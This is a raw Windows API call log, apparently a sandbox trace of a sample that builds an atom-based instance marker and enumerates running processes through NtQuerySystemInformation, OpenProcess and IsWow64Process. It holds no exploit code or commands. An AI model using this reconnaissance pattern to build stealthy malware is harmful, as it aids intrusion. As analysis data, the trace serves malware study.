	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.714] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.714] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.714] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.714] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.715] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.716] GetLastError () returned 0x5
	[0143.717] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.717] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.717] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.717] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.717] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.717] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.718] CloseHandle (hObject=0x2dc) returned 1
	[0143.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0143.718] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.718] CloseHandle (hObject=0x2dc) returned 1
	[0143.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0143.719] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.719] CloseHandle (hObject=0x2dc) returned 1
	[0143.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0143.719] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.719] CloseHandle (hObject=0x2dc) returned 1
	[0143.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.720] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.720] CloseHandle (hObject=0x2dc) returned 1
	[0143.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0143.720] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.720] CloseHandle (hObject=0x2dc) returned 1
	[0143.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0143.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16c38) returned 0xc0000004
	[0143.752] VirtualAlloc (lpAddress=0x0, dwSize=0x16d38, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0143.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16d38, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0143.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0143.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0143.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0143.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0143.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0143.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0143.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0143.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0143.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.766] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.766] CloseHandle (hObject=0x2dc) returned 1
	[0143.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0143.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0143.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.767] CloseHandle (hObject=0x2dc) returned 1
	[0143.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0143.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.767] CloseHandle (hObject=0x2dc) returned 1
	[0143.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0143.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.768] CloseHandle (hObject=0x2dc) returned 1
	[0143.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0143.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.768] CloseHandle (hObject=0x2dc) returned 1
	[0143.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0143.769] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.769] CloseHandle (hObject=0x2dc) returned 1
	[0143.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0143.769] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.769] CloseHandle (hObject=0x2dc) returned 1
	[0143.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0143.770] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.770] CloseHandle (hObject=0x2dc) returned 1
	[0143.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.770] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.770] CloseHandle (hObject=0x2dc) returned 1
	[0143.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0143.771] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.771] CloseHandle (hObject=0x2dc) returned 1
	[0143.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.771] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.771] CloseHandle (hObject=0x2dc) returned 1
	[0143.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0143.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.772] CloseHandle (hObject=0x2dc) returned 1
	[0143.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0143.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.772] CloseHandle (hObject=0x2dc) returned 1
	[0143.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0143.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.772] CloseHandle (hObject=0x2dc) returned 1
	[0143.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0143.773] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.773] CloseHandle (hObject=0x2dc) returned 1
	[0143.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0143.773] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.773] CloseHandle (hObject=0x2dc) returned 1
	[0143.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0143.774] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.774] CloseHandle (hObject=0x2dc) returned 1
	[0143.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.774] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.774] CloseHandle (hObject=0x2dc) returned 1
	[0143.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0143.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.775] CloseHandle (hObject=0x2dc) returned 1
	[0143.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0143.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.775] CloseHandle (hObject=0x2dc) returned 1
	[0143.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0143.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.776] CloseHandle (hObject=0x2dc) returned 1
	[0143.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0143.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.776] CloseHandle (hObject=0x2dc) returned 1
	[0143.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0143.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.777] CloseHandle (hObject=0x2dc) returned 1
	[0143.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0143.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.777] CloseHandle (hObject=0x2dc) returned 1
	[0143.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0143.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.778] CloseHandle (hObject=0x2dc) returned 1
	[0143.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0143.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.778] CloseHandle (hObject=0x2dc) returned 1
